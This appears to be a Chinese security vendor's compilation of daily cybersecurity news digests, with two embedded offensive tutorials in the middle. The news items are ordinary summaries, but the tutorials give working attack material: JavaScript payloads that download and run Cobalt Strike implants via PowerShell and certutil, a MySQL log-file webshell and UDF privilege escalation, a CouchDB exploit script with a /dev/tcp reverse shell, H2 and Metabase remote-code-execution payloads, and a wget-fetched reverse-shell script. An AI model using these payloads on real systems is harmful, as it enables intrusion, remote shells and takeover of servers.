网络安全日报 2024年01月09日
1、朝鲜攻击者在2023年窃取了6亿美元的加密货币
https://www.trmlabs.com/post/north-korean-hackers-stole-600-million-in-crypto-in-2023 2023 年,隶属于朝鲜民主主义人民共和国(也称为朝鲜)的威胁行为者已经掠夺了至少 6 亿美元的加密货币。尽管比 2022 年的 8.5 亿美元减少了 30%,但朝鲜“在去年加密货币攻击中被盗的资金中几乎占到了三分之一”。朝鲜实施的黑客攻击造成的平均破坏性是与朝鲜无关的黑客攻击的十倍。有迹象表明,到 2023 年底,针对加密货币行业的更多违规行为可能会将这一数字推高至 7 亿美元左右。对于朝鲜国家支持的行为者来说,针对加密
2、AsyncRAT恶意软件针对美国基础设施攻击持续11个月
https://cybersecurity.att.com/blogs/labs-research/asyncrat-loader-obfuscation-dgas-decoys-and-govno 向选定目标传送 AsyncRAT 恶意软件的活动至少在过去 11 个月内一直活跃,使用了数百个独特的加载程序样本和 100 多个域。AsyncRAT 是一款适用于 Windows 的开源远程访问工具 (RAT),自 2019 年起公开发布,具有远程命令执行、键盘记录、数据泄露和删除额外负载的功能。多年来,该工具已被网络攻击者大量使用,无论是原样还是修改后的形式,用于在目标上建立立足点、窃取文件和
3、量子安全算法CRYSTALS-Kyber存在KyberSlash安全缺陷
https://github.com/pq-crystals/kyber 用于量子安全加密的 Kyber 密钥封装机制的多种实现很容易受到一组统称为 KyberSlash 的漏洞的影响,这些缺陷可能允许恢复秘密密钥。CRYSTALS-Kyber 是量子安全算法 (QSA) 的 Kyber 密钥封装机制 (KEM) 的官方实现,也是 CRYSTALS(代数格密码学套件)算法套件的一部分。它专为通用加密而设计,是美国国家标准与技术研究所 (NIST) 选择旨在抵御量子计算机攻击的算法的一部分。使用 Kyber 实现的一些流行项目包括 Mulvad VPN 和 SignalMessenger。后者
4、QNAP 修补QTS等多个产品中的高严重性漏洞
https://www.securityweek.com/qnap-patches-high-severity-flaws-in-qts-video-station-qumagie-netatalk-products/ QNAP 已针对其产品中的十几个漏洞发布了补丁,其中包括几个高严重性漏洞。
5、瑞士空军敏感文件在黑客攻击中被盗
https://securityaffairs.com/157144/cyber-crime/swiss-air-force-data-leak.html 由于美国安全提供商遭受网络攻击,瑞士空军的文件在暗网上泄露。
6、沙特部委暴露敏感数据长达 15 个月
https://securityaffairs.com/157133/security/saudi-ministry-data-leak.html 沙特工业和矿产资源部 (MIM) 的环境文件被曝光,敏感细节向任何愿意获取这些信息的人开放。
7、报告:2023 年网络攻击使 Web3 损失 18.4 亿美元
https://www.infosecurity-magazine.com/news/cyber-attacks-drain-web3 根据 Certik 的Hack3d:2023 年 Web3 安全报告,2023年,针对 Web3 的网络攻击共发生 751 起事件,给组织造成了 18.4 亿美元的损失。
8、交通运输部印发《铁路关键信息基础设施安全保护管理办法》
https://www.freebuf.com/news/389150.html 因此,为保障铁路系统的安全稳定运行,必须制定一套全面有效的管理办法,以加强铁路关键信息基础设施的安全保护。基于这样的背景,中华人民共和国交通运输部近期公布了《铁路关键信息基础设施安全保护管理办法》(以下简称《办法》),进一步完善了我国铁路关键基础设施信息安全保障体系。(《办法》已于 2023 年 12 月 1 日经第 27 次部务会议通过,自 2024年 2 月 1 日起施行)
9、黑客劫持 X 上的政府和企业认证账户用于加密货币诈骗
https://www.bleepingcomputer.com/news/security/hackers-hijack-govt-and-business-accounts-on-x-for-crypto-scams/ 来越多黑客盯上了 X(原 Twitter)上的政府和企业官方账户,这些认证账户侧边一般都标有 "金色 "或 "灰色 "对勾。黑客劫持这些账号后,会借助其进行推广加密货币诈骗、钓鱼网站和加密货币放水网站等。
https://www.bleepingcomputer.com/news/security/hackers-hijack-govt-and-business-accounts-on-x-for-crypto-scams/ 10、Zeppelin勒索软件源码在暗网以 500 美元的价格售出
https://www.bleepingcomputer.com/news/security/zeppelin-ransomware-source-code-sold-for-500-on-hacking-forum/ 一名威胁行为者在一个网络犯罪论坛上宣布,他们仅以 500 美元的价格出售了 Zeppelin 勒索软件生成器的源代码和破解版。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年01月08日
1、研究人员披露GXC Team团伙利用AI进行网络欺诈
https://www.resecurity.com/blog/article/cybercriminals-implemented-artificial-intelligence-ai-for-invoice-fraud 研究人员发现了一个名为“ GXC Team ”的网络犯罪派别,该派别专门制作用于网上银行盗窃、电子商务欺骗和互联网诈骗的工具。2023 年 11 月 11 日左右,该组织的领导者以别名“ googleXcoder ”运作,在暗网上发布了多项公告。除夕夜,该组织宣布大幅降价,为其在暗网上销售的产品提供高达 20% 的折扣。这些帖子介绍了一种新工具,该工具结合了人工智能 (A
2、研究人员发现宝马公司子域存在SAP重定向漏洞
https://securityaffairs.com/156843/reports/bmw-affected-by-redirect-vulnerability.html 研究人员发现两个 BMW 子域容易受到 SAP 重定向漏洞的影响。它们被用来访问宝马经销商的内部工作场所系统,并且可能对攻击者进行鱼叉式网络钓鱼活动或恶意软件分发有用。SAP 重定向漏洞是一个影响 SAP 产品(SAP NetWeaver 应用程序服务器 Java)的 Web 应用程序服务器的安全问题。这意味着任何人都可以通过添加如下字符串来使用这些子域伪造重定向链接:“sap/public/bc/icf/logoff?
3、Cross Switch遭遇数据泄露影包含360万条隐私记录
https://thecyberexpress.com/cross-switch-data-breach/ Cross Switch 是在线支付网关管理领域的领先公司,目前正在处理重大数据泄露的后果。据报道,Cross Switch 数据泄露事件是由一个名为 IntelBroker 的威胁行为者实施的,据称已泄露了 360 万用户的个人信息。这包括敏感详细信息,例如全名、电子邮件、电话号码、消息、物理位置、银行信息、不记名令牌、出生日期和用户名。由于泄露的数据包括大量的个人信息,这一事件对于受影响的用户来说尤其令人担忧。
4、研究人员发现3个针对Linux的恶意PyPI软件包
https://www.fortinet.com/blog/threat-research/malicious-pypi-packages-deploy-coinminer-on-linux-devices Python Package Index (PyPI) 开源存储库中发现了三个新的恶意软件包,它们能够在受影响的 Linux 设备上部署加密货币挖矿程序。这三个有害软件包分别名为 moduleseven、driftme 和 catme,在被删除之前的一个月内总共吸引了 431 次下载。这些软件包在初次使用时,会在 Linux 设备上部署 CoinMiner 可执行文件。该活动与之前的一次
5、Ivanti警告关键的EPM漏洞可导致攻击者劫持注册设备
https://www.bleepingcomputer.com/news/security/ivanti-warns-critical-epm-bug-lets-hackers-hijack-enrolled-devices/ Ivanti 修复了其端点管理软件 (EPM) 中的一个严重远程代码执行 (RCE) 漏洞,该漏洞可让未经身份验证的攻击者劫持注册设备或核心服务器。Ivanti EPM 可帮助管理运行各种平台(从 Windows 和 macOS 到 Chrome OS 和 IoT 操作系统)的客户端设备。该安全漏洞(追踪为CVE-2023-39366)影响所有受支持的 Ivanti
6、CISA警告Chrome和Excel解析库中存在被主动利用的漏洞
https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-exploited-bugs-in-chrome-and-excel-parsing-library/ 美国网络安全和基础设施安全局已在已知利用漏洞目录中添加了两个漏洞,一个是 Google Chrome 中最近修补的缺陷,另一个是影响开源 Perl 库的错误,该库用于读取名为 Spreadsheet:arseExcel 的 Excel 文件中的信息。美国网络防御机构已要求联邦机构在 1 月 23 日之前根据供应商指示缓解 CVE-2023-7024 和
7、Cisco ASA的远程命令注入漏洞在暗网以100万美元价格出售
https://thecyberexpress.com/cisco-remote-command-injection-vulnerability 据称,名为“xc7d2f4”的威胁参与者正在出售 Cisco ASA 的远程命令注入漏洞。威胁发起者声称该漏洞存在于所有 55XX 系列的思科自适应安全设备 (ASA) 上。远程命令注入是一种涉及未经授权执行操作系统命令的攻击方法。当应用程序不安全地处理不受信任的输入来构建操作系统命令时,就会发生这种情况,通常是由于数据清理不充分和/或外部程序调用不当造成的。自适应安全设备(或 ASA)结合了防火墙、防病毒、入侵防御和 VPN 功能。它提供主动威胁
8、贝鲁特国际机场遭受网络攻击
https://securityaffairs.com/157079/hacking/cyber-attack-hit-beirut-international-airport.html 威胁行为者袭击了黎巴嫩贝鲁特拉菲克·哈里里国际机场并破坏了航班信息显示系统(FIDS)。
9、Sea Turtle网络间谍活动针对荷兰 IT 和电信公司
https://thehackernews.com/2024/01/sea-turtle-cyber-espionage-campaign.html 荷兰的电信、媒体、互联网服务提供商 (ISP)、信息技术 (IT) 服务提供商和库尔德网站已成为土耳其关系威胁组织"Sea Turtle"发起的新网络间谍活动的一部分。
10、俄罗斯黑客摧毁了乌克兰最大电信运营商的系统
https://www.freebuf.com/news/388832.html 2023年12月,俄罗斯黑客攻破了乌克兰最大的电信服务提供商Kyivstar的系统,并清除了电信运营商核心网络上的所有系统。此次事件发生后,Kyivstar的移动和数据服务中断,导致其2500万移动和家庭互联网用户中的大多数失去了互联网连接。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年01月05日
1、攻击者劫持Orange Spain的RIPE帐户造成BGP配置更改
https://www.bleepingcomputer.com/news/security/hacker-hijacks-orange-spain-ripe-account-to-cause-bgp-havoc/ Orange Spain 今天遭遇互联网中断,原因是一名黑客侵入了该公司的 RIPE 帐户,错误配置了 BGP 路由和 RPKI 配置。互联网上的流量路由由边界网关协议 (BGP) 处理,该协议允许组织将其 IP 地址与自治系统 (AS) 编号相关联,并将其通告给它们所连接的其他路由器(称为对等方)。这些 BGP 通告创建一个路由表,该路由表传播到互联网上的所有其他边缘路由器,从
2、LastPass通知用户更改为12个字符的主密码以提高安全性
https://blog.lastpass.com/2024/01/lastpass-is-making-account-updates-heres-why/ LastPass今天通知客户,他们现在需要使用至少 12 个字符的复杂主密码,以提高帐户的安全性。尽管 LastPass 自 2018 年以来一再表示 主密码要求为 12 个字符,但用户仍然可以使用较弱的密码。自 2023 年 4 月起,LastPass 开始对新帐户或密码重置强制执行 12 个字符的主密码要求,但旧帐户仍可以使用少于 12 个字符的密码。从本月开始,LastPass 对所有帐户强制执行 12 个字符的主密码要求。此外
3、HealthEC遭遇数据泄露影响了450万患者
https://www.healthec.com/cyber-incident/ HealthEC LLC 是一家健康管理解决方案提供商,遭遇了数据泄露,影响了通过该公司客户之一接受护理的近 450 万人。HealthEC 提供了一个人口健康管理 (PHM) 平台,医疗保健组织可以使用该平台进行数据集成、分析、护理协调、患者参与、合规性和报告。12 月 22 日,该公司披露,其在 2023 年 7 月 14 日至 23 日期间遭遇数据泄露,导致其部分系统遭到未经授权的访问。对该事件的调查于 2023 年 10 月 24 日结束,调查显示入侵者从托管以下数据类型的受破坏系统中窃取了文件:姓名、
4、谷歌在 2024年首次 Chrome 更新中修复了6个漏洞
https://www.securityweek.com/google-patches-six-vulnerabilities-with-first-chrome-update-of-2024/ 谷歌发布了 Chrome 120 更新,以解决六个漏洞,其中包括外部研究人员报告的四个漏洞。
5、UAC-0050使用新的网络钓鱼策略来分发 Remcos RAT
https://thehackernews.com/2024/01/uac-0050-group-using-new-phishing.html 名为 UAC-0050 的威胁行为者正在利用网络钓鱼攻击来使用新策略分发 Remcos RAT,以逃避安全软件的检测。
6、ChatGPT模型名被恶意注册域名超65万个
https://www.chinaz.com/ainews/4634.shtml 近期网络安全研究发现,黑客大规模注册与ChatGPT相似的域名,通过模糊用户判断,滥用ChatGPT模型信誉,引发恶意下载和信息泄露。
7、尼康、索尼和佳能用相机数字签名对抗 AI 作假
https://asia.nikkei.com/Business/Technology/Nikon-Sony-and-Canon-fight-AI-fakes-with-new-camera-tech 尼康、索尼和佳能正在开发在相机拍摄的照片中嵌入数字签名的技术,以区分日益复杂的 AI 图片。防篡改数字签名将包括日期、时间、地点和摄影师等信息。
8、欧洲央行将对银行进行网络压力测试评估抵御攻击的能力
https://www.inforisktoday.com/european-central-bank-to-put-banks-through-cyber-stress-test-a-24012 欧洲央行将从本月开始对银行进行网络压力测试,以确定其抵御网络攻击的能力。该机构要求欧洲 109 家银行在 2024 年中期之前进行漏洞评估和事件响应评估。
9、俄罗斯黑客潜伏于乌克兰电信巨头Kyivstar长达数月
https://www.secrss.com/articles/62502 路透伦敦1月4日 -乌克兰网络间谍负责人告诉路透,俄罗斯黑客至少从去年5月起就侵入了乌克兰电信巨头Kyivstar的系统,发起了一次网络攻击,这应该成为对西方的“重大警告”。这次黑客攻击是自近两年前俄罗斯全面入侵以来最严重的一次黑客攻击,从12月12日起,乌克兰最大的电信运营商为约2400万用户提供的服务中断了数天。
10、全球1100万SSH服务器面临"TerrapinAttack"威胁
https://www.secrss.com/articles/62479 安全威胁监控平台Shadowserver最近的一份报告警告说,互联网上有近1100万台SSH服务器(由唯一的IP地址标识),很容易受到水龟攻击(TerrapinAttack),从而威胁到某些SSH连接的完整性。“水龟攻击”是德国波鸿鲁尔大学安全研究人员开发的新攻击技术,。利用了SSH传输层协议的弱点,并结合了OpenSSH十多年前引入的较新的加密算法和加密模式。后者已被广泛的SSH实现所采用,因此影响当前的大多数SSH实例。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年01月04日
1、Steam放弃对Windows7和8.1的支持以提高安全性
https://help.steampowered.com/en/faqs/view/4784-4F2B-1321-800A 自 1 月 1 日起,Windows 7、Windows 8 和 Windows 8.1 不再支持 Steam,在此日期之后,这些操作系统上现有的 Steam 客户端安装将不再接收任何类型的更新,包括安全更新。该公司建议用户升级到更新的操作系统。该游戏公司去年警告称,Steam 客户端将在新年不受支持,并在游戏客户端顶部显示倒计时,显示距离游戏客户端将不再接收软件更新还有多少天。Steam 客户端现在显示还剩 0 天。Steam 支持将无法为用户提供与旧操作系统相关的
2、跨链平台Orbit Chain因安全漏洞损失8600万美元加密货币
https://www.bleepingcomputer.com/news/security/orbit-chain-loses-86-million-in-the-last-fintech-hack-of-2023/ Orbit Chain 经历了一次安全漏洞,导致加密货币损失 8600 万美元,特别是 Ether、Dai、Tether 和 USD Coin。Orbit Chain 是一个区块链平台,旨在充当多资产中心,支持各种区块链、去中心化应用程序 (DApp) 和服务之间的互操作性。该平台并不直接被投资者用来购买资产或服务,而更像是一个支持更广泛生态系统的区块链基础设施项目。由身份不
3、攻击者窃取伊朗23家领先保险公司上亿条记录
https://www.infostealers.com/article/mysterious-hacker-strikes-iran-with-major-cyberattacks-against-industry-leading-companies/ 研究人员报告称,12 月 20 日,一名名为“irleaks”的黑客宣布出售据称从伊朗 23 家领先保险公司窃取的超过 1.6 亿条记录。研究人员分析了样本数据并确认其似乎是真实的。目前尚不清楚黑客是如何同时针对如此多的保险公司的。12 月 30 日,irleaks 还声称入侵了伊朗最大的外卖平台 SnapFood,窃取了 3 TB 数据。
4、Google网上论坛将终止对Usenet的支持以打击垃圾邮件
https://www.bleepingcomputer.com/news/google/google-groups-is-ending-support-for-usenet-to-combat-spam/ 谷歌已正式宣布停止对其 Google Groups 平台上的 Usenet 群组的支持,此举部分归因于该平台与垃圾邮件内容的增多。即将发生的更改将于 2024 年 2 月 22 日生效,此后用户将无法再通过 Google 网上论坛发布、订阅或查看新的 Usenet 内容。但是,在此截止日期之前发布的历史 Usenet 内容仍可在平台上查看和搜索。这一变化主要是由于基于文本的 Usenet
5、Cactus勒索软件攻击了瑞典零售提供商COOP
https://securityaffairs.com/156709/cyber-crime/cactus-ransomware-coop-sweden.html Cactus 勒索软件组织声称攻击了瑞典最大的零售和杂货提供商之一的 Coop。Coop是瑞典最大的零售和杂货供应商之一,在全国拥有约 800 家商店。这些商店由 29 个消费者协会的 350 万会员共同拥有。企业中创造的所有盈余都会返回给会员或重新投资于企业,从而形成循环。Cactus勒索软件组织声称已经入侵了 Coop,并威胁要披露大量个人信息,包括超过 21000 个目录。Cactus 勒索软件组织将 Coop 添加到其 T
6、2023 年出现 21 个新的 Mac 恶意软件家族
https://www.securityweek.com/21-new-mac-malware-families-emerged-in-2023/ 2023 年总共发现了 21 个针对 macOS 系统的新恶意软件家族,比 2022 年增加了 50%。
7、网络犯罪分子利用人工智能 (AI) 进行发票欺诈
https://securityaffairs.com/156863/cyber-crime/artificial-intelligence-tool-for-invoice-fraud.html Crooks 创建了一种新工具,该工具使用人工智能 (AI) 创建用于电汇欺诈和 BEC 的欺诈发票。
8、高通芯片漏洞可通过语音通话进行远程攻击
https://www.scmagazine.com/news/qualcomm-chip-vulnerability-enables-remote-attack-by-voice-call 高通公司宣布存在一个严重漏洞,该漏洞可能导致使用其芯片组的设备受到远程攻击。该漏洞编号为 CVE-2023-33025,涉及 VoLTE 通话期间的缓冲区溢出,允许攻击者远程执行代码。
9、《未成年人网络保护条例》2024年1月1日起施行
http://www.news.cn/politics/20240101/3a9b5ca671004d0d8af40e00378c8433/c.html 《未成年人网络保护条例》自2024年1月1日起正式施行,作为我国首部专门性的未成年人网络保护综合立法,这部条例的施行标志着我国未成年人网络保护法治建设进入新阶段。
10、中国抗量子密码战略与政策法律工作组成立
http://www.anquan419.com/knews/24/6497.html 据介绍,工作组将对抗量子密码技术、产业、业务的现状和相关国内外政策、法律法规进行研究,以公开或定向方式发表抗量子密码相关蓝皮书、要报、专题研究报告等成果,推动形成中国抗量子密码共识和行动方案。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
利用蚁剑钓鱼上线CS
前言
中国蚁剑使用Electron构建客户端软件,Electron实现上用的是Node.js,并且Node.js能执行系统命令,故可以利用蚁剑的webshell页面嵌入js来直接执行命令,进而钓鱼来上线CS。(类似Goby,Goby也是使用Electron构建客户端软件)
关键实现
蚁剑在虚拟终端时,页面上出现http/https协议头时会发生转换(字体会变蓝,表示处于超链接的状态),并且这个链接点开时所打开的页面是以蚁剑内部的浏览器进行打开的(最新版本修复后使用用户自带的浏览器打开),因此这便是我们利用页面执行Node.js来上线CS的好机会!
反制复现
环境准备:
想要执行系统命令需要借助页面的加载,此时可以制造假的webshell来故意让红队连接,进而一步步引导红队点击恶意链接调用node.js进行命令执行,上钩。
影响的版本:AntSword < =v2.1.14
AntSword下载:https://github.com/AntSwordProject/antSword/releases
开源假webshell:https://github.com/MD-SEC/Anti_AntSword
1、蓝队故意在服务器放置假的webshell进行钓鱼
达到真实的效果可以添加一些提示信息,让红队上钩
<body>
AntSword password admin
</body>
</html>
红队需要让其点击的恶意链接(利用蚁剑自带的帮助文档效果最佳)
在钓鱼的帮助文档的开头插入恶意payload,这里利用powershell一句话上线
<script type="text/javascript">
require('child_process').exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://192.168.108.150:8080/a\'))"',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });
</script>
或者下载文件方式上线CS
</script>
<script type="text/javascript">require('child_process').exec("certutil.exe -urlcache -split -f http://192.168.108.150/artifact.exe C:/artifact.exe && C:/Windows/System32/conhost.exe C:/artifact.exe");</script>
注:payload一定要放开头,放后面可能由于html过大导致命令执行失败
可以自行编写攻击者点击钓鱼链接时的话术
2、红队开始利用蚁剑进行连接
模拟红队的文件浏览页面
模拟红队的命令行操作回显
3、开始钓鱼引诱红队
当红队输入没有提前在webshell模拟的命令时,就会回显一开始我们设置的钓鱼话术,引导攻击者点击恶意链接
红队点击恶意链接,出现正常的帮助文档
将红队发送的木马样本放在与cve-2022-39197.py脚本同一路径下
帮助文档由蚁剑内部的浏览器进行解析,该蚁剑浏览器会调用我们钓鱼页面恶意的js进行命令执行,然后上线CS
修复建议
1、升级至 AntSword v2.1.15版本
2、加载链接时候禁止使用内部浏览器打开,使用用户系统的浏览器打开
最后
此蚁剑反制虽然是一个之前曝光的漏洞了,但是基数上还是会有人在使用着存在漏洞的蚁剑版本,对于红队来说能白嫖webshell还是很诱惑的,可玩性也很高。
数据库攻防学习之MySQL
MySQL
0x01mysql学习
MySQL 是瑞典的MySQLAB公司开发的一个可用于各种流行操作系统平台的关系数据库系统,它具有客户机/服务器体系结构的分布式数据库管理系统。可以免费使用使用,用的人数很多。
0x02环境搭建
这里演示用,phpstudy搭建的环境,然后安装phpmyadmin
0x03漏洞复现
日志文件包含getshell
利用前提
知道网站路径,mysql版本大于5.0
利用条件 需要可读可写的权限,也就是高权限账号
所用到的命令
show variables like '%general%'; 查看日志读写功能
SET GLOBAL general_log='on';开启日志读写功能
select @@basedir; 查看mysql所在的绝对路径
SHOW VARIABLES LIKE"secure_file_priv";如果值为文件夹目录,则只允许修改目录下的文件,如果值为NULL则为禁止。
SET GLOBALgeneral_log_file='C:/phpstudy_pro/WWW/shell.php';修改日志文件路径
修改设置,该为开启,这样才能继续利用。
再次查询,可以发现已经发生了改变
访问验证
select '<?php eval($_POST["a"]);?>';
总结,如果SHOW VARIABLES LIKE"secure_file_priv";为NULL则没办法使用into outfile写文件,那么可以开启日志,修改日志文件路径和文件名为php,然后执行一个带有一句话的查询语句,完成getshell。
mysql udf提权
这里使用win10 +phpstudy,直接下个msyql就行了
udf提权是mysql的一种常见的提权方式。
什么是udf?
udf可以理解为用户自定义函数,可以用udf增加一些函数,在mysql里就能用这个函数了。
提权前提
获取mysql的控制权限。
mysql具有写入权限,即secure_file_priv的值为空。
show global variables like'%secure%';用这个查询
提权背景
拿到了mysql权限,没拿到服务器权限,可以通过mysql提权使其达到拿到服务器的权限
提权实验
实验版本mysql 5.5 操作系统win10
需要udf文件,可以从sqlmap里获取或者msf中获取。
这里可以直接用国光师傅的写好udf16进制
https://www.sqlsec.com/tools/udf.htmlshow global variables like'%secure%';
如果不是空的话可以这样修改,这个需要在mysql目录下的ini文件进行修改或者添加。
secure_file_priv=''然后重启服务。
如果是 MySQL >= 5.1 的版本,必须把 UDF 的动态链接库文件放置于 MySQL安装目录下的 libplugin 文件夹下文件夹下才能创建自定义函数。
这里我自己在目录下创建一个,也可以用NTFSADS方法创建目录,但有可能不成功。
http://192.168.48.137/phpMyAdmin4.8.5/url.php?url=https://dev.mysql.com/doc/refman/5.5/en/show-variables.htmlhttp://192.168.48.137/phpMyAdmin4.8.5/url.php?url=https://dev.mysql.com/doc/refman/5.5/en/show-variables.htmlhttp://192.168.48.137/phpMyAdmin4.8.5/url.php?url=https://dev.mysql.com/doc/refman
查询发现已经有了,然后进行文件写入。
路径D:phpstudy_proExtensionsMySQL5.5.29libplugin
如果有Can't open shared library 'udf.dll',切换成32位试试。
实战中不成功,可以轮流尝试。
创建自定义函数并且调用命令
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
select sys_eval('whoami');
select sys_eval('dir');
发现已经成功并且是Administrator权限
couchdb数据库
漏洞介绍
ApacheCouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,CreditSuisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露利用
漏洞复现
CVE-2017-12635
PUT发包创建用户
选择内网映射端口为5984的抓包访问
http://192.168.48.133:54944/_utils/#login这个为登陆应用
发包目的是增加用户,可以用bp或者postman
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host:
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 110
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles": [],
"password": "vulhub"
}
成功添加用户
CVE-2017-12636
CVE-2017-12636 exp 命令执行
import requests
import json
import base64
from requests.auth import HTTPBasicAuth
target = 'http://your-ip:5984'
command = rb"""sh -i >& /dev/tcp/10.0.0.1/443 0>&1"""
version = 1
session = requests.session()
session.headers = {
'Content-Type': 'application/json'
}
# session.proxies = {
# 'http': 'http://127.0.0.1:8085'
# }
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
"type": "user",
"name": "wooyun",
"roles": ["_admin"],
"roles": [],
"password": "wooyun"
}''')
session.auth = HTTPBasicAuth('wooyun', 'wooyun')
command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" %
base64.b64encode(command).decode()
if version == 1:
session.put(target + ('/_config/query_servers/cmd'),
data=json.dumps(command))
else:
host = session.get(target +
'/_membership').json()['all_nodes'][0]
session.put(target +
'/_node/{}/_config/query_servers/cmd'.format(host),
data=json.dumps(command))
session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id":
"wooyuntest"}')
if version == 1:
session.post(target + '/wooyun/_temp_view?limit=10',
data='{"language":"cmd","map":""}')
else:
session.put(target + '/wooyun/_design/test',
data='{"_id":"_design/test","views":{"wooyun":{"map":""}
},"language":"cmd"}')
h2database数据库
H2 是一个开源的嵌入式数据库引擎,纯 java实现的关系型数据库,不受平台的限制。
未授权访问
发现其可以未授权访问jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;
在JDBC URL输入这个语句点击connect即可未授权访问
RCE姿势
在VPS里面创建个sql文件,然后远程加载利用服务。
re_shell.sql
CREATE TABLE test (
id INT NOT NULL
);
CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript
Java.type("java.lang.Runtime").getRuntime().exec("bash -c
{echo,base64加密的反弹shell指令}|{base64,-d}|{bash,-i}");';
bash -i >& /dev/tcp/ip/7888 0>&1
远程加载姿势如下,填入python启动的ip和端口
jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT
FROM 'http://IP:port/re_shell.sql';
mongodb数据库
大致介绍一下
MongoDB是一个基于分布式文件存储的数据库
由C++语言编写,旨在为WEB应用提供可扩展的高性能数据存储解决方案。
未授权访问漏洞
可以用msf检测
search mongodb
存在未授权访问漏洞
可以利用mongodb连接工具直接连接
metabase数据库分析
metabase是一款开源的简易但强大同时又无缝兼容大数据和传统数据库的分析工具
Metabase geojson任意文件读取漏洞 (CVE-2021-41277)
payload /api/geojson?url=file:/etc/passwd
Metabase 远程代码执行漏洞(CVE-2023-38646)
Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松地连接到各种数据源,包括数据库、云服务和API,然后使用直观的界面进行数据查询、分析和可视化。Metabase 存在远程代码执行漏洞,可导致攻击者在服务器上以运行 Metabase服务器的权限执行任意代码。
这里使用vulhub的docker环境,vulfocus可能有问题没复现成功
GET访问
/api/session/properties
exp
POST /api/setup/validate HTTP/1.1
Host: your-ip
Content-Type: application/json
{
"token": "token值",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db":
"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1;CREATE
TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS
$//javascriptnjava.lang.Runtime.getRuntime().exec('执行的命令')n$--=x",
"advanced-options": false,
"ssl": true
},
"name": "test",
"engine": "h2"
}
}
验证一下
python启动一个http服务,然后exec执行curl ip:8899/1.txt
python3 -m http.server 8899
验证成功
尝试反弹shell
未能成功反弹shell,利用其他方法进行反弹shell,可以执行命令从VPS下载sh脚本然后在用命令运行该脚本进行反弹shell
创建个re_shell.sh,内容如下
!/bin/sh
bash -c 'exec bash -i >& /dev/tcp/ip/6667 0>&1'
执行 wget http://ip:port/re_shell.sh
执行
/bin/bash /tmp/re_shell.sh
成功反弹shell
网络安全日报 2024年01月03日
1、DLL搜索顺序劫持新变体可绕过Win10和11系统保护
https://www.securityjoes.com/post/hide-and-seek-in-windows-closet-unmasking-the-winsxs-hijacking-hideout 安全研究人员详细介绍了动态链接库 ( DLL ) 搜索顺序劫持技术的新变体,威胁行为者可以利用该技术绕过安全机制并在运行 Microsoft Windows 10 和 Windows 11 的系统上执行恶意代码。该方法“利用受信任的 WinSxS 文件夹中常见的可执行文件,并通过经典的 DLL 搜索顺序劫持技术来利用它们” 。通过这样做,它允许攻击者在尝试在受感染的计算机上运行恶意代码
2、Terrapin新漏洞可能会降低SSH协议的安全性
https://terrapin-attack.com/ 波鸿鲁尔大学的安全研究人员发现了 Secure Shell ( SSH ) 加密网络协议中的一个漏洞,该漏洞可能允许攻击者通过破坏安全通道的完整性来降低连接的安全性。该漏洞被称为Terrapin(CVE-2023-48795,CVSS 评分:5.9),被描述为“有史以来第一个实际上可利用的前缀截断攻击”。SSH 是一种通过不安全的网络安全地向计算机发送命令的方法。它依靠加密技术来验证和加密设备之间的连接。这是通过握手来实现的,其中客户端和服务器就加密原语达成一致,并交换建立可提供机密性和完整性保证的安全通道所需的密钥。
3、公积金组织EPFO警告针对公积金账户的欺诈活动持续增长
